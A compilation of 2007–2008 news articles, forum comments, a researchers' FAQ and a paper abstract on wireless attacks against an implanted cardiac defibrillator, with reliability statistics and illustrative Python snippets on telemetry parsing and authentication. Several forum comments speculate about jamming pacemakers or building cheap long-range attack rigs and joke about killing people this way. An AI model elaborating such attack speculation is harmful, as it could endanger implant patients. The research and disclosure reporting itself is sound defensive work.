Dr. William H. Maisel is director of the Medical Device Safety Institute at Beth Israel Deaconess Medical Center and assistant professor of medicine at Harvard Medical School. He has an active cardiology practice and also directs the Pacemaker and Defibrillator Service at Beth Israel Deaconess Medical Center. His research interests involve the safe and effective use of medical devices, and he has published extensively on the safety of pacemakers and defibrillators, drug-eluting stents and other cardiovascular devices. He received his M.D. from Cornell University, his MPH from the Harvard School of Public Health, and completed his internal medicine and cardiovascular training at Brigham and Women’s Hospital. Maisel is an FDA consultant and former Chairman of the FDA’s Circulatory System Medical Device Advisory Panel.

A better method (Score:5, Interesting) /  by yamamushi
“The article details how the researchers had to be within 2 inches of the pacemaker, and several thousands of dollars worth of equipment. I suspect there is an easier way to deactivate a pacemaker, find out what frequency they operate at. I’ve got an FM radio blocker, that is basically just a 100mhz oscillator, a potentiometer, and a battery. It works by canceling out a given frequency, thus letting me silence my neighbors stereo from 50ft away. I know the technique works for the 2.4ghz band, for blocking out wireless phone signals and whatnot. I suppose finding an oscillator in the high ghz range would suffice for ‘killing’ a pacemaker.”

Re:Ah, the smart-arse non-sequiturs (Score:5, Informative) /  by I_Love_Pocky!
“I appreciate your enthusiasm, but thank god you aren’t designing these devices. I work for one of the competitors to Medtronic (the company whose devices were studied). We have encryption in our RF communication. We DO take security into consideration, but there are trade offs that have to be considered. Battery life is generally the most important consideration. Every time surgery needs to be performed to physically access the device (usually because of a depleted battery) there is a risk of complications. These aren’t insignificant risks either. Keep in mind the people getting these devices have health problems of some sort or they wouldn’t be getting them. With that in mind, security solutions in this domain have to be very well thought out so as to avoid draining the battery significantly. So please, don’t for a second presume that we are a bunch of monkeys sitting around on our asses ignoring real concerns. The real issue is that there are far more concerns than you are aware of. We do evaluate these concerns and try to build the best devices possible with the fewest compromises.”

Hacking the VP (Score:5, Funny)  /  by tobiasly
“Yes, that’s a very real concern that the secret service has been terrified of for years. Most people know that Cheney has a pacemaker, but the real secret is that they forgot to turn off SSID broadcast and its password is ‘Linksys’.”

Will the bionic man have virus protection?
by John Borland  /  August 09, 2007

Gadi Evron, a prominent Israeli network security expert, has some questions about a future when we let software into our bionic, cybernetic bodies. Say we really do start modifying ourselves, he asked a late-night crowd here at the Chaos Computer Camp. Presumably, that means a bit of hardware, a bit of software. And as any security consultant knows, every piece of software ever written by an actual human is riddled with flaws and bugs, which translate all too easily into security flaws. Suddenly a whole slew of problems familiar to the network security world appear. If someone finds a bug in a bionic body part, what are the ethical issues? Should it be reported widely? Just to the company producing the component? Hidden, or sold for profit? And what about patches? Will people line up at schools for heart-implant fixes, like for today’s flu shot? Will viruses distribute false patches, and infect body parts? Or an apocalyptic scenario: what if our cybernetic tools synchronized themselves with Outlook? With wireless connections, viruses could even spread, well, through the air. What kind of intellectual property issues could arise? Pirates, crackers, ransom-artists, virus-writers, all focused on the body instead of the laptop. In part, Evron uses these analogies to demonstrate issues in computer security to non-experts, for whom the idea of body-hacking might help illustrate problems. But it’s also a daunting take on strains in biology and genetics that are only barely still science fiction. A little of the computer security mindset would be a healthy thing as we enter the uncharted territory of body modification, he argues. “Biology needs to undergo a computer science infusion,” Evron said. “We need to reverse engineer genetics.”

A Heart Device Is Found Vulnerable to Hacker Attacks
by Barnaby J. Feder  /  March 12, 2008

To the long list of objects vulnerable to attack by computer hackers, add the human heart. The threat seems largely theoretical. But a team of computer security researchers plans to report Wednesday that it had been able to gain wireless access to a combination heart defibrillator and pacemaker. They were able to reprogram it to shut down and to deliver jolts of electricity that would potentially be fatal — if the device had been in a person. In this case, the researchers were hacking into a device in a laboratory. The researchers said they had also been able to glean personal patient data by eavesdropping on signals from the tiny wireless radio that Medtronic, the device’s maker, had embedded in the implant as a way to let doctors monitor and adjust it without surgery. The report, to be published at, makes clear that the hundreds of thousands of people in this country with implanted defibrillators or pacemakers to regulate their damaged hearts — they include Vice President Dick Cheney — have no need yet to fear hackers. The experiment required more than $30,000 worth of lab equipment and a sustained effort by a team of specialists from the University of Washington and the University of Massachusetts to interpret the data gathered from the implant’s signals. And the device the researchers tested, a combination defibrillator and pacemaker called the Maximo, was placed within two inches of the test gear.

Defibrillators shock hearts that are beating chaotically and dangerously back into normal rhythms. Pacemakers use gentle stimulation to slow or speed up the heart. Federal regulators said no security breaches of such medical implants had ever been reported to them. The researchers said they chose Medtronic’s Maximo because they considered the device typical of many implants with wireless communications features. Radios have been used in implants for decades to enable doctors to test them during office visits. But device makers have begun designing them to connect to the Internet, which allows doctors to monitor patients from remote locations. The researchers said the test results suggested that too little attention was being paid to security in the growing number of medical implants being equipped with communications capabilities. “The risks to patients now are very low, but I worry that they could increase in the future,” said Tadayoshi Kohno, a lead researcher on the project at the University of Washington, who has studied vulnerability to hacking of networked computers and voting machines. The paper summarizing the research is called “Pacemakers and Implantable Cardiac Defibrillators: Software Radio Attacks and Zero-Power Defenses.” The last part refers to defensive possibilities the researchers outlined that they say would enhance security without draining an implant’s battery. They include methods for warning a patient of tampering or requiring that an incoming signal be authenticated, using energy harvested from the incoming signals. But Mr. Kohno and Kevin Fu, who led the University of Massachusetts arm of the project, said they had not tried to test the defenses in an actual implant or to learn if anyone trying to use them might run afoul of existing patent claims. Another participant in the project, Dr. William H. Maisel, a cardiologist who is director of the Medical Device Safety Institute at the Beth Israel Deaconess Medical Center in Boston, said that the results had been shared last month with the F.D.A., but not with Medtronic. “We feel this is an industry-wide issue best handled by the F.D.A.,” Dr. Maisel said.

The F.D.A. had already begun stepping up scrutiny of radio devices in implants. But the agency’s focus has been primarily on whether unintentional interference from other equipment might compromise the safety or reliability of the radio-equipped medical implants. In a document published in January, the agency included security in a list of concerns about wireless technology that device makers needed to address. Medtronic, the industry leader in cardiac regulating implants, said Tuesday that it welcomed the chance to look at security issues with doctors, regulators and researchers, adding that it had never encountered illegal or unauthorized hacking of its devices that have telemetry, or wireless control, capabilities. “To our knowledge there has not been a single reported incident of such an event in more than 30 years of device telemetry use, which includes millions of implants worldwide,” a Medtronic spokesman, Robert Clark, said. Mr. Clark added that newer implants with longer transmission ranges than Maximo also had enhanced security. Boston Scientific, whose Guidant division ranks second behind Medtronic, said its implants “incorporate encryption and security technologies designed to mitigate these risks.” St. Jude Medical, the third major defibrillator company, said it used “proprietary techniques” to protect the security of its implants and had not heard of any unauthorized or illegal manipulation of them. Dr. Maisel urged that patients not be alarmed by the discussion of security flaws. “Patients who have the devices are far better off having these devices than not having them,” he said. “If I needed a defibrillator, I’d ask for one with wireless technology.”

Studies Show Reliability, Failure Rates for Cardiac Devices

Pacemakers and implantable cardioverter-defibrillators (ICDs) are among the most clinically important and technically complex medical devices in use today, but several recent high-profile device malfunctions have called into question their safety and reliability. Two reports in the April 26, 2006 issue of The Journal of the American Medical Association (JAMA) offer new insights into pacemaker and ICD performance by providing the most comprehensive analysis of malfunction data available to date. “Despite millions of pacemaker and ICD implants worldwide and their increasingly frequent use, surprisingly little is known about device reliability,” says the studies’ lead author William H. Maisel, MD, MPH, director of the Pacemaker and Device Service at Beth Israel Deaconess Medical Center (BIDMC) and Assistant Professor of Medicine at Harvard Medical School. The devices work to stabilize abnormal heart rhythms, pacemakers by treating hearts that beat too slowly and ICDs by treating heart rhythms that have become dangerously fast.

In the first study, which Maisel performed with colleagues at the U.S. Food and Drug Administration (FDA), he found that, between the years of 1990 and 2002, there were 2.25 million pacemakers and almost 416,000 ICDs implanted in the U.S. During this same time period, 17,323 devices (8,834 pacemakers and 8,489 ICDs) were surgically removed from patients due to a confirmed device malfunction. (Battery, capacitor and electrical abnormalities accounted for approximately half of the device failures.) In addition, 61 patient deaths were attributed to pacemaker or ICD malfunction during this 13-year period. “Overall, the annual ICD malfunction replacement rate of 20.7 per 1,000 implants was significantly higher than the pacemaker malfunction replacement rate of 4.6 per 1,000 implants,” notes Maisel. “While pacemakers became increasingly reliable during the study period, a marked increase in the ICD malfunction replacement rate was observed between 1998 and 2002, suggesting that ICDs may have become less reliable during this time period.”
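As a rough sanity check on these counts, the crude cumulative replacement proportions can be computed directly (a sketch in Python; note that the 20.7 and 4.6 per 1,000 figures Maisel quotes are *annual* rates computed against year-by-year implant counts, so the simple cumulative proportions below come out lower for pacemakers while showing the same roughly fivefold disparity):

```python
# Counts reported in the JAMA analysis of FDA data, 1990-2002.
pacemakers_implanted = 2_250_000
icds_implanted = 416_000
pacemaker_replacements = 8_834
icd_replacements = 8_489

# Crude cumulative malfunction-replacement proportions per 1,000 implants
# over the whole study period (not the annualized rates from the paper).
pm_rate = pacemaker_replacements / pacemakers_implanted * 1000
icd_rate = icd_replacements / icds_implanted * 1000

print(f"Pacemakers: {pm_rate:.1f} replacements per 1,000 implants (cumulative)")
print(f"ICDs:       {icd_rate:.1f} replacements per 1,000 implants (cumulative)")
print(f"ICDs were replaced for malfunction about {icd_rate / pm_rate:.0f}x as often")
```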

In the second study (conducted by Maisel on non-FDA data), an analysis of international pacemaker and ICD registries involving hundreds of thousands of pacemakers and thousands of ICDs, the overall findings proved very similar to those reported in the analysis of the FDA data. “Specifically, in this second report, pacemaker reliability improved markedly during the study period while the ICD malfunction rate trended down during the first half of the 1990s, reaching its lowest level in the mid-to-late 1990s. And, once again, the ICD malfunction rate increased substantially between the years of 1998 and 2002.” But, he adds, this analysis showed a substantial improvement in ICD reliability in 2003 and 2004, years that were not included in the FDA analysis. “Pacemakers and implantable defibrillators are amazing devices that have saved many lives,” says Maisel. “But like any other complex device, they can and do malfunction. It appears that as ICDs became increasingly sophisticated [in the latter 1990s] there was an associated decrease in device reliability. Fortunately, the most recent defibrillator malfunction rates show a reassuring trend.”

Maisel stresses that patients do not need to take any action as a result of these studies, and that routine pacemaker and defibrillator checks remain the best way to monitor device performance in individual patients. “It’s important to remember that during the time periods we analyzed, there were tens of thousands of lives saved as a result of these devices,” he adds. “The chance of a person’s life being saved by a pacemaker or ICD is about 1,000 times greater than the chance of the device failing when it’s needed.” The analysis of FDA data (first study) was funded by the U.S. Food and Drug Administration, for which Maisel serves as a paid consultant and Chair of the FDA Circulatory System Medical Devices Advisory Panel. Study coauthors included Megan Moynahan, MS, Bram D. Zuckerman, MD, Thomas P. Gross, MD, MPH, Oscar H. Tovar, MD, Donna-Bea Tillman, PhD, MPA, and Daniel B. Schultz, MD, all of the FDA’s Center for Devices and Radiological Health, Rockville, MD. The analysis of registry data (second study) was conducted independently by Dr. Maisel without FDA financial support.

New data finds defibrillator recalls to be common  /  May 19, 2006

Data presented May 19, 2006 at the Heart Rhythm Society’s 27th Annual Scientific Sessions finds that during a 10-year study period more than one in five automatic external defibrillators (AEDs) were recalled due to potential malfunction. The findings represent some of the first data available on safety and reliability of the devices, which are used to resuscitate victims of cardiac arrest. “AEDs provide automated heart rhythm analysis, voice commands, and shock delivery and can be used by individuals with minimal training or experience,” explains the study’s lead author, William H. Maisel, M.D., M.P.H., director of the Pacemaker and Device Service at Beth Israel Deaconess Medical Center (BIDMC) and assistant professor of medicine at Harvard Medical School. “As a result, widespread installation of AEDs has occurred in recent years.” In fact, he adds, the annual number of the devices distributed between 1996 and 2005 increased almost 10-fold, from fewer than 20,000 to nearly 200,000. “Public places such as airports, sports arenas and casinos are now routinely outfitted with AEDs and the U.S. Food and Drug Administration [FDA] has approved certain AED models for home use,” he says. “Unfortunately, as AED use has increased, so too has the number of recalled devices.” Maisel and his colleagues reviewed weekly FDA enforcement reports to identify recalls and safety alerts (collectively referred to as “advisories”) affecting AEDs. Enforcement reports are issued by the FDA to notify the public about potentially defective medical devices which may not function as intended. During the study period – beginning in 1996 and ending in 2005 – the authors found that the FDA issued 52 advisories involving either AEDs or critical AED accessories, affecting a total of 385,922 devices. “The results showed that during this 10-year study period, more than one in five AEDs were recalled due to a potential malfunction,” says Maisel.

Security researchers to unveil pacemaker, medical implant hacks
by Chris Soghoian  /   March 3, 2008

A team of respected security researchers known for their work hacking RFID radio chips has turned its attention to pacemakers and implantable cardiac defibrillators. The researchers will present their paper, “Pacemakers and Implantable Cardiac Defibrillators: Software Radio Attacks and Zero-Power Defenses,” during the “Attacks” session of the 2008 IEEE Symposium on Security and Privacy, one of the most prestigious conferences in the computer security field. The authors of the paper are listed as: Shane S. Clark, Benessa Defend, Daniel Halperin, Thomas S. Heydt-Benjamin, Will Morgan, Benjamin Ransford, Kevin Fu, Tadayoshi Kohno, William H. Maisel. Kevin Fu, an assistant professor at the University of Massachusetts Amherst, and the two graduate students who worked on the project gained significant attention for their past work attacking RFID-based credit cards and RFID (radio frequency identification) transit payment tokens. Kohno, a professor at the University of Washington, was the subject of worldwide media coverage for his work exposing flaws in Diebold voting machines back in 2003, and then later for finding major privacy flaws in the RFID-based Nike+iPod Sport Kit.

Shocking stuff
When contacted by e-mail, Kohno told me that he and his colleagues could not currently comment on their latest project. Without the help of the authors, it is difficult to predict the contents of their research paper. However, it is possible to piece together other bits of information to try to learn more about the project. A previous research paper published by the same team noted that over 250,000 implantable cardiac defibrillators are installed in patients each year. An increasingly large percentage of these can be remotely controlled and monitored by specialized wireless devices in the patient’s home. The devices can be accessed at ranges of up to 5 meters. By reading between the lines (millions of implanted medical devices, able to administer electrical shocks to the heart, can be controlled remotely from distances of up to 5 meters, designed by people who know nothing about security), it is easy to predict the gigantic media storm that this paper will cause when the full details (and a YouTube video of a demo, no doubt) are made public. Just remember where you saw it first.


Q: What are implantable medical devices (IMDs)?
A: Implantable Medical Devices (IMDs) monitor and treat physiological conditions within the body, and can help patients lead normal and healthy lives. There are many different kinds of IMDs, including pacemakers, implantable cardiac defibrillators (ICDs), drug delivery systems, neurostimulators, swallowable camera capsules, and cochlear implants. These devices can help manage a broad range of ailments, including: cardiac arrhythmia; diabetes; chronic pain; Parkinson’s disease; obsessive compulsive disorder; depression; epilepsy; obesity; incontinence; and hearing loss. The pervasiveness of IMDs continues to grow, with approximately twenty-five million U.S. citizens currently benefiting from therapeutic implants.

Q: What are pacemakers and implantable cardiac defibrillators (ICDs)?
A: Pacemakers and ICDs are both designed to treat abnormal heart conditions. About the size of a pager, each device is connected to the heart via electrodes and continuously monitors the heart rhythm. Pacemakers automatically deliver low energy signals to the heart to cause the heart to beat when the heart rate slows. Modern ICDs include pacemaker functions, but can also deliver high voltage therapy to the heart muscle to shock dangerously fast heart rhythms back to normal. Pacemakers and ICDs have saved innumerable lives, and there are millions of pacemaker and ICD patients in the U.S. today.

Q: Where do you see the technologies for these devices heading in the future?
A: The technologies underlying implantable medical devices are rapidly evolving, and it’s impossible to predict exactly what such devices will be like in 5, 10, or 20 years. It is clear, however, that future devices may rely more heavily on wireless communications capabilities and advanced computation. IMDs may communicate with other devices in their environment, thereby enabling better care through telemedicine and remote patient health monitoring. There may also be multiple, inter-operating devices within a patient’s body. Given the anticipated evolution in IMD technologies, we believe that now is the right and critical time to focus on protecting the security and privacy of future implantable medical devices.

Q: Why is it important to study the security and privacy properties of existing implantable medical devices?
A: Despite recent large advances in IMD technologies, we still have little understanding of how medical device security and privacy interact with and affect medical safety and treatment efficacy. Established methods for providing safety and preventing unintentional accidents do not necessarily prevent intentional failures and other security and privacy problems. Balancing security and privacy with safety and efficacy will, however, become increasingly important as IMD technologies continue to evolve. Prior to our work, we were unaware of any rigorous public scientific investigation into the observable characteristics of a real, common commercial IMD. Such a study is necessary in order to provide a foundation for understanding and addressing the security, privacy, safety, and efficacy goals of future implantable devices. Our research provides such a study. The overall goals of our research were to: (1) assess the security and privacy properties of a real, common commercial IMD; (2) propose solutions to the identified weaknesses; (3) encourage the development of more robust security and privacy features for IMDs; and (4) improve the privacy and safety of IMDs for the millions of patients who enjoy their benefits.

Q: Can you summarize your findings with respect to the security and privacy of a common implantable cardiac defibrillator (ICD)?
A: As part of our research we evaluated the security and privacy properties of a common ICD. We investigated whether a malicious party could create his or her own equipment capable of wirelessly communicating with this ICD. Using our own equipment (an antenna, radio hardware, and a PC), we found that someone could violate the privacy of patient information and medical telemetry. The ICD wirelessly transmits patient information and telemetry without observable encryption. The adversary’s computer could intercept wireless signals from the ICD and learn information including: the patient’s name, the patient’s medical history, the patient’s date of birth, and so on. Using the same equipment, we found that someone could also turn off or modify therapy settings stored on the ICD. Such a person could render the ICD incapable of responding to dangerous cardiac events. A malicious person could also make the ICD deliver a shock that could induce ventricular fibrillation, a potentially lethal arrhythmia. For all our experiments our antenna, radio hardware, and PC were near the ICD. Our experiments were conducted in a computer laboratory and utilized simulated patient data. We did not experiment with extending the distance between the antenna and the ICD.
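To illustrate why the absence of observable encryption matters, consider the following hypothetical sketch. The frame layout below is entirely invented (the researchers deliberately withheld the real format), but it shows the general point: once an eavesdropper has demodulated the bits of an unencrypted transmission, recovering patient fields is a trivial parsing exercise, not a cryptanalysis problem.

```python
import struct

# Hypothetical plaintext telemetry frame -- NOT the real ICD format.
# Illustrative layout: 16-byte patient name, 8-byte date of birth
# (YYYYMMDD), unsigned 16-bit heart rate, unsigned 16-bit battery mV.
FRAME = struct.pack("<16s8sHH", b"JANE DOE", b"19530214", 72, 2800)

def parse_frame(raw: bytes) -> dict:
    """Recover fields from a demodulated, unencrypted frame."""
    name, dob, rate, batt = struct.unpack("<16s8sHH", raw)
    return {
        "name": name.rstrip(b"\x00").decode(),
        "dob": dob.decode(),
        "heart_rate_bpm": rate,
        "battery_mv": batt,
    }

print(parse_frame(FRAME))
```

With encryption in place, the same intercepted bytes would be indistinguishable from random noise to anyone without the key.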

Q: Do other implantable medical devices have similar issues?
A: We only studied a single implantable medical device. We currently have no reason to believe that any other implantable devices are any more or less secure or private.

Q: Can you summarize your approaches for defending against the security and privacy issues that you raise?
A: Our previous research (IEEE Pervasive Computing, January-March 2008) highlights a fundamental tension between (1) security and privacy for IMDs and (2) safety and effectiveness. Another goal we tackle in our research is the development of technological mechanisms for providing a balance between these properties. We propose three approaches for providing this balance, and we experiment with prototype implementations of our approaches. Our approaches build on the WISP technology from Intel Research. Some IMDs, like pacemakers and ICDs, have non-replaceable batteries. When the batteries on these IMDs become low, the entire IMDs often need to be replaced. From a safety perspective, it is therefore critical to protect the battery life on these IMDs. Toward balancing security and privacy with safety and effectiveness, all three of our approaches use zero power: they do not rely on the IMD’s battery but rather harvest power from external radio frequency (RF) signals. Our first zero-power approach utilizes an audible alert to warn patients when an unauthorized party attempts to wirelessly communicate with their IMD. Our second approach shows that it is possible to implement cryptographic (secure) authentication schemes using RF power harvesting. Our third zero-power approach presents a new method for communicating cryptographic keys (“sophisticated passwords”) in a way that humans can physically detect (hear or feel). The latter approach allows the patient to seamlessly detect when a third party tries to communicate with their IMD. We do not claim that our defenses are final designs that IMD manufacturers should immediately incorporate into commercial IMDs. Rather, we believe that our research helps establish a potential foundation upon which the community can innovate other new defensive mechanisms for future IMD designs.
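To give a sense of the kind of cryptographic authentication the second approach shows is feasible on harvested power, here is a generic challenge-response sketch using HMAC. This is a textbook construction for illustration only, not the scheme from the paper, and it ignores the RF power-harvesting constraints that make the real engineering problem hard.

```python
import hashlib
import hmac
import os

# Assumed for illustration: a key pre-shared between the IMD and an
# authorized programmer. Key distribution is itself a hard problem the
# paper's third approach (human-perceptible key communication) targets.
SHARED_KEY = os.urandom(16)

def imd_challenge() -> bytes:
    """IMD emits a fresh random nonce, so replaying old responses fails."""
    return os.urandom(8)

def programmer_response(key: bytes, nonce: bytes) -> bytes:
    """Programmer proves knowledge of the key without transmitting it."""
    return hmac.new(key, nonce, hashlib.sha256).digest()

def imd_verify(key: bytes, nonce: bytes, response: bytes) -> bool:
    """IMD accepts commands only from a party that passed the challenge."""
    expected = hmac.new(key, nonce, hashlib.sha256).digest()
    return hmac.compare_digest(expected, response)

nonce = imd_challenge()
print(imd_verify(SHARED_KEY, nonce, programmer_response(SHARED_KEY, nonce)))
print(imd_verify(SHARED_KEY, nonce, programmer_response(os.urandom(16), nonce)))
```

The design choice worth noting is that verification costs the IMD only one hash computation per session, which is what makes running it on RF-harvested power plausible in the first place.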

Q: Where will these results be published?
A: Our results will be published at the IEEE Symposium on Security and Privacy in May 2008. The IEEE is a leading professional association for the advancement of technology. The IEEE Symposium on Security and Privacy is one of the top scholarly conferences in the computer security research community. This year the conference accepted 28 out of 249 submissions (11.2%). All papers were rigorously peer-reviewed by at least three members of the IEEE Security and Privacy committee.

Q: Should patients be concerned?
A: We strongly believe that nothing in our report should deter patients from receiving these devices if recommended by their physician. The implantable cardiac defibrillator is a proven, life-saving technology. We believe that the risk to patients is low and that patients should not be alarmed. We do not know of a single case where an IMD patient has ever been harmed by a malicious security attack. To carry out the attacks we discuss in our paper would require: malicious intent, technical sophistication, and the ability to place electronic equipment close to the patient. Our goal in performing this study is to improve the security, privacy, safety, and effectiveness of future IMDs.

Q: What have you done to ensure that these findings will not be used for malicious intent?
A: We specifically and purposefully omitted methodologic details from our paper, thereby preventing our findings from being used for anything other than improving patient security and privacy.

Cheap, actually
by Kevin McMurtrie / posted 12th March 2008
“Their hacking equipment cost $30,000 because of that fancy oscilloscope shown. It wouldn’t surprise me if it cost $29,000. The paper states the frequency and encoding protocol. Hackers don’t need the fancy oscilloscope now. Taking into account what a hacker already owns, that cuts the cost down to maybe $50 for a short-range model. Boosting the range to a few city blocks would require maybe another $100 in parts. I bet Cheney goes in for an operation soon.”

RE: Scary Stuff
by Anonymous Coward / posted 12th March 2008
Denial of Life attack : What protection is there against *accidental* re-programming or DoS?
by Keith T / posted 12th March 2008
“Regarding the 30k price tag, it is a radio transceiver and a computer. Medtronic paid $30k for theirs. That doesn’t mean someone couldn’t put something together for less. In fact, my main worry would be someone accidentally re-programming or operating the IMD. What protection is there against that? Could it be done by a hacker with a laptop and a standard wireless NIC card? Would the wireless NIC card need to be modified? Could it be done with random noise from a faulty electric motor? And how can we be assured nobody has ever died due to their IMD being intentionally re-programmed? If the device was intentionally re-programmed, would the attacker revert the programming back once the victim had died? Would anyone even check the state of the program in the IMD?”

Needs to be close by
by Herby / posted 12th March 2008
“Having done some work for one of these companies (it was a few years ago!) my understanding is that the “controller” (actually a laptop PC) needs to be in close proximity to the “subject”. They usually use “induction”, not radio frequency, to couple to the implanted device (at least that is what I saw). Yes, security is not something the device vendors, or the FDA, think about. Lots of medical devices have “unpatched” Windows environments because the vendors haven’t gone through the process of verification with the latest Windows patches. Most of the time these computers are not connected to a network (they usually don’t need to be!), but sometimes they do get connected, and then the malware arrives with evil intentions. On the ICD I did some work on they used a 65C02 processor, which they needed to get certified outside the normal supply chain (look at any datasheet for ICs and it usually says “not for life critical…”). Then they need to get ALL the software to pass FDA rules (lots of time and $$$). By the time everything is done, the development cost is HUGE. Then they deploy the stuff, and the added cost of a laptop per implantable device is “small potatoes”, so they just build it into the kit. In my book the big problem is the controlling box (laptop) used to program the implant to do its thing (parameters per subject). As usual, security isn’t a big consideration since most of the development is in an isolated environment. It was interesting how the company “solved” problems in the test environment. It ended up being 4 (yes four) Windows boxes (it was W95) and a logic analyzer to test the ICD, which had a 65C02 processor (same as the Apple II). Need something, add more hardware! In order to get the timing for the network between the 4 CPUs right, they even incorporated a relay to cut off the network from outside the 4 CPUs. Oh, well. It was Windows, they didn’t even try anything else.”
A lot cheaper than 30K
by Anonymous Coward / posted 13th March 2008
“That kit may have cost 30K, but I am betting it can be done for under 1K, probably about $400. Well it is a dog eat dog world, I wouldn’t put it past some young exec to put 1 and 1 together, and see that getting to the top may involve a bit of heartbreak. It used to be the case that the medical world was off limits to hackers, a sort of unwritten agreement, but with governments using the medical world to build the ID databases, that has sort of been rescinded. Bit like using the Red Cross for spying missions, they are now targets because of it. I would imagine that EMP devices would be on the up as well, there I would blame speed cameras, people are taking angle grinders to them, how much easier would it be to just zap them. And of course EMP could be used against a slew of modern security surveillance devices, with the side effect of knocking out the cyborgs with unprotected pacemakers.”


Defcon: Excuse me while I turn off your pacemaker
by Dean Takahashi  /  August 8th, 2008

The Defcon conference is the wild and woolly version of Black Hat for the unwashed masses of hackers. It always has its share of unusual hacks. The oddest so far is a collaborative academic effort where medical device security researchers have figured out how to turn off someone’s pacemaker via remote control. They previously disclosed the paper at a conference in May. But the larger point of the vulnerability of all wirelessly-controlled medical devices remains a hot topic here at the show in Las Vegas. Let’s not have a collective heart attack, at least not yet. The people on the right side of the security fence are the ones who have figured this out so far. But this has very serious implications for the 2.6 million people who had pacemakers installed from 1990 to 2002 (the stats available from the researchers). It also presents product liability problems for the five companies that make pacemakers.

Kevin Fu, an assistant professor at the University of Massachusetts at Amherst and director of the Medical Device Security Center, said that his team and researchers at the University of Washington spent two years working on the challenge. Fu presented at Black Hat while Daniel Halperin, a graduate student at the University of Washington, presented today at Defcon. Getting access to a pacemaker wasn’t easy. Fu’s team had to analyze and understand pacemakers for which there was no available documentation. Fu asked the medical device makers, explaining his cause fully, but didn’t get any help. William H. Maisel, a doctor at Beth Israel Deaconess Medical Center and Harvard Medical School, granted Fu access for the project. Fu received an old pacemaker as the doctor installed a new one in a patient. The team had to use complicated procedures to take apart the pacemaker and reverse engineer its processes. Halperin said that the devices have a built-in test mechanism which turns out to be a bug that can be exploited by hackers. There is no cryptographic key used to secure the wireless communication between the control device and the pacemaker.

A computer acts as a control mechanism for programming the pacemaker so that it can be set to deal with a patient’s particular defibrillation needs. Pacemakers administer small shocks to the heart to restore a regular heartbeat. The devices have the ability to induce a fatal shock to a heart. Fu and Halperin said they used a cheap $1,000 system to mimic the control mechanism. It included a software radio, GNU Radio software, and other electronics. They could use that to eavesdrop on private data such as the identity of the patient, the doctor, the diagnosis, and the pacemaker instructions. They figured out how to control the pacemaker with their device. “You can induce the test mode, drain the device battery, and turn off therapies,” Halperin said.

Translation: you can kill the patient. Fu said that he didn’t try the attack on other brands of pacemakers because he just needed to prove the academic point. Halperin said, “This is something that academics can do now. We have to do something before the ability to mount attacks becomes easier.” The disclosure at Defcon wasn’t particularly detailed, though the paper has all of the information on the hack. The crowd here is mostly male, young, with plenty of shaved heads, tattoos and long hair. The conference is a cash-only event where no pictures are allowed without consent. It draws thousands more people from a much wider net of security researchers and hackers than the more exclusive Black Hat. Similar wireless control mechanisms are used for administering drugs to a patient or other medical devices. Clearly, the medical device companies have to start working on more secure devices. Other hackers have figured out how to induce epileptic seizures in people sensitive to light conditions. The longer I stay at the security conferences here in Las Vegas, the scarier it gets.

Kevin Fu
email : kevinfu [at] cs [dot] umass [dot] edu

Daniel Halperin
email : dhalperi [at] cs [dot] washington [dot] edu

“Our study analyzes the security and privacy properties of an implantable cardioverter defibrillator (ICD). Introduced to the U.S. market in 2003, this model of ICD includes pacemaker technology and is designed to communicate wirelessly with a nearby external programmer in the 175 kHz frequency range. After partially reverse-engineering the ICD’s communications protocol with an oscilloscope and a software radio, we implemented several software radio-based attacks that could compromise patient safety and patient privacy. Motivated by our desire to improve patient safety, and mindful of conventional trade-offs between security and power consumption for resource-constrained devices, we introduce three new zero-power defenses based on RF power harvesting. Two of these defenses are human-centric, bringing patients into the loop with respect to the security and privacy of their implantable medical devices (IMDs). Our contributions provide a scientific baseline for understanding the potential security and privacy risks of current and future IMDs, and introduce human-perceptible and zero-power mitigation techniques that address those risks. To the best of our knowledge, this paper is the first in our community to use general-purpose software radios to analyze and attack previously unknown radio communications protocols.”


“Over 9,000 hackers, freaks, feds and geeks are gathered in Las Vegas for Defcon, the world’s largest computer security convention. The temporary wireless network that serves the Defcon attendees is the most hostile on the planet. Defcon’s network is put together and run by a group of dedicated volunteers, known as Goons. These red badge-sporting Network Goons work hard to make the network robust enough to handle the endless stream of dangerous traffic. Threat Level got the first ever photo tour of the Defcon Network Operations Center. Here are the photos for your viewing pleasure.”

Defcon ends with researchers muzzled, viruses written
by Elinor Mills  /  August 10, 2008

The Defcon hacker conference ended its 16th year on Sunday, sending about 8,000 attendees home from a weekend of virus writing, discussion of Internet attacks, and general debauchery. The highlight was most definitely the restraining order which prevented three MIT students from presenting their research on how to hack the Boston subway system. The students attended the event and even gave a news conference after the order came down on Saturday, but did not present their highly anticipated talk. Instead, journalist and security expert Brenno de Winter took their empty spot and discussed how the cards used in transit systems in the Netherlands and London can be hacked just like the ones used in Boston. Both systems, and many around the world, use the Mifare Classic chip technology, whose cryptography was cracked by researchers last year. “I was advised by several lawyers not to go into details of the Mifare Classic, but anybody who has access to Google…,” de Winter said. Breaking the rules is always a theme at Defcon, but while irreverence for established corporate and government protocols is condoned if not exactly encouraged, breaking Defcon rules definitely has its consequences. Defcon officials said they were considering banning film crews from future events after ejecting a team from the G4 cable network on Saturday for allegedly videotaping a crowd. Photographers and videographers are required to get permission to shoot anyone, even from behind, and are forbidden from shooting crowds.

There was a report that police were called in to investigate a Windows-based kiosk that was hacked to display pornographic images in the lobby. And the usual rowdiness and late-night drinking were a nightly, if not daily, activity. However, things did not seem to reach the level of tomfoolery they did in the early and mid-1990s when elevators were hacked and cement was poured down toilets. Of course, many of the script kiddies from that era are now married with children. There were, of course, a range of sessions, including ones on evaluating the risks of “good viruses,” hijacking outdoor billboard networks, and compromising Windows-based Internet kiosks. Members of SecureState, a company that does penetration testing of corporate networks, gave a live demo in one session of an automated attack on a Microsoft SQL Server-based computer that left the machine vulnerable to attackers installing viruses and other malware. The team used new tools they are offering for download, SA Exploiter and Fast-Track.

